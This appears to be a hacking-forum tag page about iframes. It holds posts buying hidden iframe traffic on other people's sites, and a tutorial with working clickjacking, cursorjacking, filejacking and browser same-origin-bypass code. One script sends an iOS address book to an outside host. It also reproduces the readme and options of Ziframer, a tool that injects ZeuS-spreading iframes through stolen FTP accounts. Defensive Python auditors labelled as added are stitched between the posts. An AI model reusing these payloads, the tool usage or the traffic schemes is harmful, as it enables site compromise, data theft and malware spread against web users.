Showing results for tags 'iframe'.
-
Hello. I want to buy visitors, it doesn't matter from which country. I want the traffic to come through an iframe. I await offers in private!
-
Same origin bypasses using clickjacking

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. It is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function. The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008. Clickjacking can be understood as an instance of the confused deputy problem, a term used to describe when a computer is innocently fooled into misusing its authority [Wikipedia].

The clickjacking attack is a common security flaw, wherein a transparent iframe and customized CSS fool a user into clicking on an invisible object without knowing. The following code is an example of a status update:

<html>
<head><title>Status Update</title></head>
<body>
<form name="updatestatus" action="javascript: alert('Status updated')" method="POST">
<input type="hidden" name="status" value="You are my hero, blah blah blah">
<input type="hidden" name="Anticsrftoken" value="jaklgbkj4wtfgfklsafghajfnmacdnwmrauf">
<input type="submit" name="twitter" value="Update here">
</form>
</body>
</html>

Let's have a look at the above mentioned code. In this example, a user will see a button "Update here", and once the user clicks on the button, a prompt will come up that says "Status updated". The real page would contain a URL where those user input values are sent. When the user clicks on the submit button, the user's status is updated. To exploit this, the attacker needs to frame the vulnerable site into a transparent iframe.

<html>
<head>
<style>
iframe {
  filter:alpha(opacity=0);
  opacity:0;
  position:absolute;
  top: 250px;
  left: 40px;
  height: 300px;
  width: 250px;
}
img {
  position:absolute;
  top: 0px;
  left: 0px;
  height: 300px;
  width: 250px;
}
</style>
</head>
<body>
<!-- The user sees the following image -->
<img src="http://httpsecure.org/wp-content/uploads/2014/06/CSRF-220x170.png">
<!-- but he effectively clicks on the following framed content -->
<iframe src="http://httpsecure.org/uid=145496823/status.php"></iframe>
</body>
</html>

In the above shown code, there is no visible presence of the framed content. This way, the user won't see the iframe content; instead he will see only the mentioned image. Because of the hidden frame, the user will only see the above mentioned image instead of the application's real content. If the user clicks on the button, the hidden HTML form loads inside the iframe and sends the value. This is the simplest example of how a user can be fooled into performing unwanted actions. Even if the application relies on an Anti-CSRF token, it does not impact the delivery of the clickjacking attack. This is because the resource to be framed is loaded normally and contains a valid Anti-CSRF token.

Note: Clickjacking is the perfect example of bypassing an Anti-CSRF token.

The above mentioned example demonstrates what clickjacking is and how it is exploited. If you need the attack to take dynamic information such as mouse movement from the target, you can throw JavaScript into the code. This enables you to get the exact x and y coordinates of the current mouse position. One clickjacking aim is to ensure your target's mouse is always on top of the button, so the victim will click wherever you want. Rich Lundeen and Brendan Coles created a BeEF command module implementing this very technique. Now, you have two frames, one inner and the other an outer iframe.
The inner frame gets its position updated according to the current mouse cursor position, and the outer iframe loads the target origin you want to exploit with the same attack. So, this way the mouse cursor is always wherever you want. The following code uses the jQuery API to dynamically update the position of the outer frame given the current mouse coordinates:

$j("body").mousemove(function(e) {
  $j(outerObj).css('top', e.pageY);
  $j(outerObj).css('left', e.pageX);
});

The inner iframe style uses the opacity trick to render an invisible element:

filter:alpha(opacity=0);
opacity:0;

The clickjacking BeEF module with the preceding HTML as the inner iframe will send all clicks to the iframe. The iframe is following the mouse movements. So, wherever the user clicks on the page, they will be clicking the status update button. The iframe is reliably following the mouse movements. The cursor is still on top of the button. When the user decides to click somewhere, the click will trigger the onClick event of the button in the framed page. As you can see in the source of the framed page, this will result in an Alert dialog.

Same origin bypasses using cursorjacking

This is typically similar to the clickjacking attack; however, in this issue we will focus on the mouse cursor. Good examples of cursorjacking were demonstrated by Eddy Bordi and refined by Marcus Niemietz. Cursorjacking deceives users by means of a custom cursor image, where the pointer is displayed with an offset. The displayed cursor is shifted to the right from the actual mouse position. Let's consider the following page:

<html>
<head>
<style type="text/css">
#c { cursor:url("http://localhost/basic_cursorjacking/new_cursor.png"),default; }
#c input { cursor:url("http://localhost/basic_cursorjacking/new_cursor.png"),default; }
</style>
</head>
<body>
<h1>This is an example of CursorJacking. Click on the 'b' or 'd' buttons.</h1>
<div id="c">
<input type="button" value="a" onclick="alert('clicked on a')">
<input type="button" value="b" onclick="alert('clicked on b')">
<br>
<input type="button" value="c" onclick="alert('clicked on c')">
<input type="button" value="d" onclick="alert('clicked on d')">
</div>
</body>
</html>

You can see the mouse cursor is changed with a custom image. This contains a mouse icon that is moved to a static offset on the right. Clicking the second button results in clicking the first button. In the above example, the image background is visible; however, in a real case scenario the image would have a transparent background. When the user tries to click the B and D buttons in the page, he would actually be clicking the button on the left of the page. This new attack vector relies on completely hiding the cursor in the body of the page and adding the following style to the body element:

<body style="cursor:none">

Let's take another example. A different cursor image is then dynamically overlaid and is associated with mousemove events.
The following code gives you a demo of this technique:

<html>
<head><title>Advanced cursorjacking by Kotowicz & Heiderich</title>
<style>
body,html {margin:0;padding:0}
</style>
</head>
<body style="cursor:none;height: 1000px;">
<img style="position: absolute;z-index:1000;" id="cursor" src="cursor.png" />
<div style="margin-left:300px;">
<h1>Is this a good example of cursorjacking?</h1>
</div>
<button style="font-size: 150%;position:absolute;top:130px;left:630px;">YES</button>
<button style="font-size: 150%;position:absolute;top:130px; left:680px;">NO</button>
<div style="opacity:1;position:absolute;top:130px;left:30px;">
<a href="https://twitter.com/share" class="twitter-share-button" data-via="kkotowicz" data-size="small">Tweet</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
</div>
<script>
function shake(n) {
  if (parent.moveBy) {
    for (i = 10; i > 0; i--) {
      for (j = n; j > 0; j--) {
        parent.moveBy(0,i);
        parent.moveBy(i,0);
        parent.moveBy(0,-i);
        parent.moveBy(-i,0);
      }
    }
  }
}
shake(5);
var oNode = document.getElementById('cursor');
var onmove = function (e) {
  var nMoveX = e.clientX, nMoveY = e.clientY;
  oNode.style.left = (nMoveX + 600)+"px";
  oNode.style.top = nMoveY + "px";
};
document.body.addEventListener('mousemove', onmove, true);
</script>
</body>
</html>

Note: the above code was written by Kotowicz & Heiderich.

In this example, the mouse cursor image is replaced with a custom image. Also, an event listener is then attached to the page body, listening for mousemove events. When the user's mouse is moved, the event triggers the listener, which results in the fake mouse cursor (the visible one) moving accordingly. Clicking the YES button results in clicking the Tweet button. This technique actually originally bypassed NoScript's ClearClick protection.
Bypass same origin policy using filejacking

Filejacking allows the extrusion of directory content from the target's underlying operating system to the attacker's server through clever UI manipulation within the browser. The result is that, under certain conditions, you can download files from the target server. In order to perform this attack successfully, first the target must use Chrome, because it's the only browser which supports the directory and webkitdirectory input attributes like the following. Second, the attack relies on baiting the victim into clicking somewhere, similar to the clickjacking attack. In this scenario, the input element presented is hidden behind a button element. Kotowicz published this attack in a research paper in 2011 after analyzing the impact of delivering the filejacking attack to users baited with social engineering tricks. The filejacking attack depends on the target using the operating system's "Choose Folder" dialog box when downloading a file from the web. To perform this attack, you should attempt to trick the user into selecting a directory containing sensitive files, for instance by employing authentic-looking phishing content that demonstrates what the target will see if they select the "Download to…" button. JavaScript code will enumerate the files in the directory with the directory input attribute, and then POST each of the files back to your server. In order to exploit filejacking, you can Google it and find server and client side code for the same. The input element should have its opacity set to 0, so that it is covered by the visible button element. When the victim clicks the button, they are actually clicking the input element, assuming they need to select a download destination. When the victim clicks on the input element, a download destination is chosen, the onchange event on the input element is then triggered and the malicious function will execute.

This results in enumerating the files contained in the selected download destination and formatting the content using the FormData object, which is extruded with a cross-origin POST XMLHttpRequest. The enumerated directory files are uploaded to the server.

FYI: The origin of the two previous snippets is different, which does not prevent the attack from working. The file could be extruded from the target's OS in SOP-powered browsers such as Firefox, Chrome and Safari. In cross-origin scenarios, the browser still sends the XMLHttpRequest, even though the response cannot be read.

References
http://en.wikipedia.org/wiki/Clickjacking
https://browserhacker.com/

Source
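The post notes that frame busting or X-Frame-Options: deny stops these framing attacks. The following is an added example, not code from the post or from BeEF: a simplified model of how a browser applies X-Frame-Options and CSP frame-ancestors, usable to audit a site's clickjacking protection offline (all header values and the page/framer URLs are constructed).

```python
"""Decide whether a page's response headers stop it from being framed.

Added example, not from the original post: a simplified model of how a
browser applies X-Frame-Options and CSP frame-ancestors, so a defender can
audit clickjacking protection offline. All header values are constructed.
"""
from urllib.parse import urlsplit


def _origin(url):
    """Reduce a URL to its scheme://host[:port] origin, lowercased."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _csp_source_matches(src, framer, page):
    """Match one frame-ancestors source expression against the framing URL."""
    s = src.strip().strip("'").lower()
    if s == "none":
        return False
    if s == "self":
        return _origin(framer) == _origin(page)
    if s == "*":
        return True
    f = urlsplit(framer)
    if s.endswith(":") and "/" not in s:          # scheme-source, e.g. https:
        return f.scheme == s[:-1]
    if "://" not in s:                             # host-source inherits the page scheme
        s = urlsplit(page).scheme + "://" + s
    scheme, _, hostport = s.partition("://")
    host, _, port = hostport.partition(":")
    if f.scheme != scheme:
        return False
    if host.startswith("*."):
        if not f.hostname.endswith(host[1:]):
            return False
    elif f.hostname != host:
        return False
    default = {"https": 443, "http": 80}.get(f.scheme)
    fport = f.port or default
    return port == "*" or (int(port) if port else default) == fport


def frameable_by(headers, framer, page):
    """True if the document at `page` may be framed by a document at `framer`.

    CSP frame-ancestors wins when present; otherwise X-Frame-Options decides;
    with neither header the page is frameable, i.e. exposed to clickjacking.
    """
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            return any(_csp_source_matches(s, framer, page) for s in value.split())
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _origin(framer) == _origin(page)
    parts = xfo.split(None, 1)
    if len(parts) == 2 and parts[0] == "ALLOW-FROM":   # legacy, ignored by modern browsers
        return _origin(framer) == _origin(parts[1])
    return True


if __name__ == "__main__":
    page = "https://httpsecure.org/status.php"
    for label, hdrs in [("no header", {}),
                        ("X-Frame-Options DENY", {"X-Frame-Options": "DENY"}),
                        ("CSP frame-ancestors 'self'",
                         {"Content-Security-Policy": "frame-ancestors 'self'"})]:
        print(f"{label:28} frameable by attacker.example: "
              f"{frameable_by(hdrs, 'https://attacker.example/', page)}")
```

A page that returns True for an origin you do not control is the one the transparent-iframe trick above can still wrap.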
-
SOP Bypassing in Safari

To help you understand better, http://httpsecure.org and file://httpsecure are both treated as different origins. The Safari browser (iOS and Mac) version 6.0.2 does not enforce the same origin policy when you need to access a local resource. When an attached HTML file is opened using the file scheme, the JavaScript code contained within can bypass the SOP and start two-way communications with different origins. Consider the following page:

<html>
<body>
<h1>I'm a local file loaded using the file:// scheme</h1>
<script>
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
  if (xhr.readyState == 4) {
    alert(xhr.responseText);
  }
};
xhr.open("GET", "http://httpsecure.org/docs/safari_sameoriginpolicy_bypassing/other_origin.html");
xhr.send();
</script>
</body>
</html>

Now that the page has been loaded via the file scheme, the XMLHttpRequest object is able to read the response after requesting the above mentioned resource.

SOP Bypassing in Firefox

Firefox is the most used browser, and the same origin policy bypass was found by Gareth Heyes in October 2012. The issue found by him is critical and the company decided to fix it and stop its distribution. The issue, found in version 16, resulted in unauthorized access to the window.location object outside the constraints of the SOP. The bypassing code is shown below.

<!Doctype html>
<script>
function poc() {
  var win = window.open('https://httpsecure.org/abc/', 'newWin', 'width=200,height=200');
  setTimeout(function(){
    alert('Hello '+/^https:\/\/httpsecure.org\/([^/]+)/.exec(win.location)[1])
  }, 5000);
}
</script>
<input type=button value="Firefox knows" onclick="poc()">

Execution of the above code from an origin you control will also authenticate into httpsecure in a separate tab of the browser. This loads httpsecure.org/abc and the application redirects to https://httpsecure.org/<user_uid>/lists (where user_uid is your httpsecure handle).
After 5 seconds, the exec function will trigger the window.location object to be parsed with the regex (here's the bug, as it shouldn't be accessible cross-origin). This results in the httpsecure handle being displayed in the alert box.

In August 2012, when Mozilla released its version with support for HTML5 sandboxed iframes, Braun found the issue that, when using allow-scripts as a value of the iframe sandbox attribute, rogue/fake JavaScript from the iframe content could still access window.top. This would change the outer window.location.

<!-- Outer file, bearing the sandbox -->
<iframe src="inner.html" sandbox="allow-scripts"></iframe>

The framed code was:

<!-- Framed document, inner.html -->
<script>
// escape sandbox:
if(top != window) {
  top.location = window.location;
}
// all following JavaScript code and markup is unrestricted:
// plugins, popups and forms allowed.
</script>

This code would normally need the additional allow-top-navigation keyword to be specified, which allows JavaScript code loaded inside an iframe to change the location of the window. An attacker could use this to redirect the user/victim to a malicious website by hooking the victim's browser.

Note: In HTML5, a new iframe attribute was introduced, called sandbox. The main focus of this new attribute was to have a more granular and secure way to use iframes, with limited potential harm from third party content embedded from different origins. The sandbox attribute value can be empty or one of the following keywords: allow-forms, allow-popups, allow-same-origin, allow-scripts, allow-top-navigation.

SOP Bypassing in Opera

The same origin policy bypass was found by Heyes. The issue was critical: Opera was not properly enforcing the same origin policy when overriding prototypes or the constructor of an iframe location object.
Let's take the following code example:

<html>
<body>
<iframe id="ifr" src="http://httpsecure.org/xdomain.html"></iframe>
<script>
var iframe = document.getElementById('ifr');
function do_something(){
  var iframe = document.getElementById('ifr');
  iframe.contentWindow.location.constructor.prototype.__defineGetter__.constructor('[].constructor.prototype.join=function(){console.log("pwned")}')();
}
setTimeout("do_something()",3000);
</script>
</body>
</html>

Following is the content framed from a different origin:

<html>
<body>
<b>I will be framed from a different origin</b>
<script>
function do_join(){
  [1,2,3].join();
  console.log("join() after prototype override: " + [].constructor.prototype.join);
}
console.log("join() before prototype override: " + [].constructor.prototype.join);
setTimeout("do_join();", 5000);
</script>
</body>
</html>

In the above mentioned framed code, the console value of constructor.prototype.join is the native code used when join() is called on an array. After a few seconds, the join() method is called on the [1,2,3] array and the printing function used previously is called again. If you take a deep look back at the above mentioned code, you will see that the join() prototype gets overridden inside the do_something() function.

Note: Heyes also found a SOP bypass by overriding prototypes and using literal values, which were not filtered by Opera before.

In a real case scenario, this bypass only works in a frameable web application, so if the application has already mitigated vulnerabilities like clickjacking by frame busting or X-Frame-Options: deny, it cannot be targeted and can be considered mitigated. Let's take an example where the target has two tabs open in an Opera browser, where one is a hacked tab and the other is authenticated. If you create an iframe with a src tag pointing at the authenticated origin, you can read the iframe content, through which you can access any sensitive information.
Same Origin Policy Bypassing in Cloud Storage

If you think the same origin policy is limited to browsers and their plugins only, then consider this: cloud storage services are also vulnerable to SOP bypass. The same was also found in Dropbox 1.4.6 on iOS and 2.0.1 on Android, and Google Drive 1.0.1 on iOS. All of these services offer you to store and synchronize files to the cloud. Roi Saltzman found this issue, which is a bit similar to the Safari SOP bypass. This bypass relies on the loading of a file in a privileged zone:

File://var/mobile/application/app_uuid

If an attacker is able to trick the target into loading an HTML file through the client application, the JavaScript code contained in the file will be executed. In this attack, the file is loaded in a privileged zone which allowed JavaScript access to the local file system of the mobile device.

FYI: if the HTML file is loaded using the file scheme, nothing prevents JavaScript from accessing another file like:

file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb

The above mentioned database contains the user's address book on iOS. In this, if the target application denies file access outside of the application scope, you can still retrieve the cached file. In this attack, if the user accesses this malicious link, the contents of the user's address book will be sent to httpsecure.org.

<html>
<body>
<script>
local_xhr = new XMLHttpRequest();
local_xhr.open("GET", "file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb");
local_xhr.send();
local_xhr.onreadystatechange = function () {
  if (local_xhr.readyState == 4) {
    remote_xhr = new XMLHttpRequest();
    remote_xhr.onreadystatechange = function () {};
    remote_xhr.open("GET", "http://httpsecure.org/?f=" + encodeURI(local_xhr.responseText));
    remote_xhr.send();
  }
}
</script>
</body>
</html>

Same Origin Policy Bypassing in Cross-Origin Resource Sharing (CORS)

CORS is also vulnerable to the same origin policy bypass. CORS has a misconfiguration of:

Access-Control-Allow-Origin: *

The above mentioned header is a potential misconfiguration. Research says that more than one million applications have misconfigured the Access-Control-Allow-Origin header. This allows any application on the Internet to submit a cross origin request to the site and read the response. The wildcard value for Access-Control-Allow-Origin is not so insecure if a permissive policy is used to provide content that does not contain sensitive information.

Source
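The post ends with the Access-Control-Allow-Origin: * misconfiguration. The following is an added example, not code from the post: it evaluates a CORS response the way a browser would (is the body readable from a given Origin, with and without credentials) and flags the risky patterns a defender should look for. The header sets, the origins and the allow-list TRUSTED_ORIGINS are all constructed for the example.

```python
"""Evaluate a CORS response as a browser would, and flag misconfigurations.

Added example, not from the original post. Given the Origin a page sent and
the headers the server returned, decide whether the cross-origin response is
readable and whether the policy is risky. All headers are constructed samples.
"""

# Constructed allow-list for the audit; a real deployment would load its own.
TRUSTED_ORIGINS = {"https://app.httpsecure.org"}


def _normalise(headers):
    return {k.lower(): v.strip() for k, v in headers.items()}


def cors_readable(origin, headers, with_credentials=False):
    """True if a script running at `origin` can read this response's body."""
    h = _normalise(headers)
    acao = h.get("access-control-allow-origin")
    acac = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return False                       # no CORS header: SOP blocks reading
    if with_credentials:
        # Browsers reject '*' for credentialed requests; the origin must match
        # exactly and Access-Control-Allow-Credentials must be true.
        return acao == origin and acac
    return acao == "*" or acao == origin


def audit_cors(origin, headers):
    """Return a list of policy problems seen from the defender's side."""
    h = _normalise(headers)
    acao = h.get("access-control-allow-origin")
    acac = h.get("access-control-allow-credentials", "").lower() == "true"
    issues = []
    if acao is None:
        return issues
    if acao == "*":
        issues.append("wildcard origin: any site can read non-credentialed responses")
        if acac:
            issues.append("wildcard with credentials: browsers ignore it, but the policy is broken")
    elif acao == "null":
        issues.append("'null' origin allowed: sandboxed iframes and file:// pages can read responses")
    elif acao == origin and origin not in TRUSTED_ORIGINS:
        # The server echoed an arbitrary Origin back: effectively a wildcard,
        # and with credentials it exposes the victim's session data.
        issues.append("origin reflected without validation")
        if acac:
            issues.append("reflected origin with credentials: authenticated data readable cross-site")
    if acac and "vary" not in h:
        issues.append("missing Vary: Origin on a credentialed response (shared caches may mix origins)")
    return issues


if __name__ == "__main__":
    evil = "https://attacker.example"
    cases = {
        "wildcard":  {"Access-Control-Allow-Origin": "*"},
        "reflected": {"Access-Control-Allow-Origin": evil,
                      "Access-Control-Allow-Credentials": "true"},
        "strict":    {"Access-Control-Allow-Origin": "https://app.httpsecure.org",
                      "Access-Control-Allow-Credentials": "true", "Vary": "Origin"},
    }
    for name, hdrs in cases.items():
        print(name, cors_readable(evil, hdrs, with_credentials=True), audit_cors(evil, hdrs))
```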
-
Buying Facebook pages: 50-150k Romania - not brought in through addmefast; or I rent them. Buying iframe traffic, 2-5k per day.
-
Buying an invisible / hidden iframe on sites with more than 10,000 uniques per day; the country doesn't matter. I'm interested in the long term. PM
-
An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automatically puts a drive-by infection on the specified html, php or asp files. In this case the Iframer is a PHP script which is used to spread a variant of ZeuS (aka Zbot/WSNPoem). The Iframer is called "Ziframer" and is sold for $30. The PHP script can be launched via the command line or accessed using a web browser.

The script is very simple and just needs a list of FTP accounts which the script should check. As you can see on the screenshot above, the input file (ftp.txt) currently contains more than 18,000 stolen FTP credentials. In the file "iframe.txt" the attacker can define the (JavaScript or HTML) code he would like to inject. The cybercriminal also has the possibility to set a timeout, a file where the script will report invalid FTP credentials (bad.txt) and a file which will collect valid FTP credentials (good.txt). The screenshot below shows the script while working through the list of stolen FTP credentials (ftp.txt).

Last but not least, the attacker has to define where he wants to put the malicious code. He has the following options:

start page – Inject the code at the top of the page
end – Inject the code at the bottom of the page
change – Replace a text or a string in the page with the malicious code
check – Check if the malicious code is already on the page

Now the cybercriminal just has to press the "START" button to run the script. The Iframer script will now go through the FTP accounts and inject the malicious code which is defined in the file "iframe.txt" (see this one). To make the use of the script more user friendly, the script has a readme file which describes the usage of the script in Russian and English.

Content of readme.html (English):

This script is designed to test the FTP accounts for validity and insert the code into files on the FTP.
[Features]
[*] Console and web interface
[*] Runs stably under Windows and *nix/BSD
[*] Checks FTP accounts for validity
[*] Pastes the code (at the beginning or end of the file, or a full overwrite of the file with your text – deface)
[*] Comments out foreign iframes
[*] Convenient logs
[*] All accounts (valid \ invalid) remain in the database.
[*] The names of the files to insert the code into can be set by regExp, such as index\.(.*)[_b] or [_b](.*).php|html|asp|htm.
[*] It goes through all the folders on the site.
[*] The update function replaces your old code with the new one (for example, if the address of the frame changed)

[Run]
[!] Recommended to use the console interface
Windows: Open a console (Start -> Run -> cmd). Write the path to php.exe, for example c:\php\php.exe, then write the path to the script (zifr.php). For example: c:\php\php.exe D:\soft\ziframer\zifr.php. The script will run and display the help text.
*NIX: Open the console / ssh. Write php, then write the path to the script (zifr.php). For example: php /home/user/soft/ziframer/zifr.php. The script will run and display the help text.

[Options]
-file -f Path to the file with your FTP accounts
-code -c Path to the file with the code to be inserted
-inject -i Where to insert the code; three options: start – top of the page, end – bottom of the page, change – replace text in the page with the code
-time -t Timeout for connecting to the FTP
-del -d With this option, foreign iframes are commented out
-update -u Update your code; with this option the script searches for your inserted code and replaces it with the new one
-good -g File where working FTP accounts will be stored
-bad -b File where non-working FTP accounts will be stored
-hide -h If you enable this option, your code will not be marked, but you will not be able to use the update function
-restore -r Continue from the last FTP; if you did not have time to do the whole list, you can start from where you stopped

Conclusion

The Ziframer script is very simple and cheap. Even a n00b is able to use it.
It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one show how infection vectors are more and more shifting from e-mails with malicious attachments to drive-by. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts that can be acquired on the underground market.

Source fuckav.ru
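A site owner whose FTP credentials may have been in a list like ftp.txt needs to find what was planted. The following is an added example, not code from the post or from the tool it describes: a scanner that walks html/php/asp files and reports iframes that are hidden by size or style or that point off-site, the shapes the injection modes above produce. The sample page, the hostnames and the own_hosts allow-list are constructed for the example.

```python
"""Scan web content for injected hidden iframes of the kind Ziframer plants.

Added example, not from the original post. Walks html/php/asp files, finds
<iframe> tags, and flags ones that are hidden by style or size or that point
off-site. The sample page below is constructed, not a real infection.
"""
import os
import re

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r'([a-z-]+)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)', re.I)
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])", re.I)


def _attrs(tag):
    """Parse a tag's attributes into a lowercase-keyed dict, quotes stripped."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag)}


def _tiny(value):
    """True for a width/height that renders (almost) nothing, e.g. 0 or 1px."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1


def find_suspicious_iframes(html, own_hosts=()):
    """Return (line_number, src, reasons) for each iframe that looks injected."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        a = _attrs(m.group(0))
        reasons = []
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("zero/one-pixel size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden by style")
        src = a.get("src", "")
        host = re.match(r"(?:https?:)?//([^/:]+)", src, re.I)
        if host and host.group(1).lower() not in own_hosts:
            reasons.append("off-site src")
        if reasons:
            hits.append((html.count("\n", 0, m.start()) + 1, src, reasons))
    return hits


def scan_tree(root, own_hosts=(), exts=(".html", ".htm", ".php", ".asp")):
    """Scan every file under root with a web extension; returns {path: hits}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_suspicious_iframes(fh.read(), own_hosts)
                if hits:
                    report[path] = hits
    return report


# Constructed sample: a legitimate page with a frame appended after </html>,
# as the script's "end" injection mode would do.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="/widgets/map.html" width="400" height="300"></iframe>
</body></html>
<iframe src="http://bad.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
"""

if __name__ == "__main__":
    for line, src, why in find_suspicious_iframes(SAMPLE_PAGE, own_hosts=("www.example.org",)):
        print(f"line {line}: {src} -> {', '.join(why)}")
```

Run scan_tree against a copy of the document root; any hit after the closing </html> tag or at the very top of a file is the injection pattern described above and the file's FTP credentials should be treated as compromised.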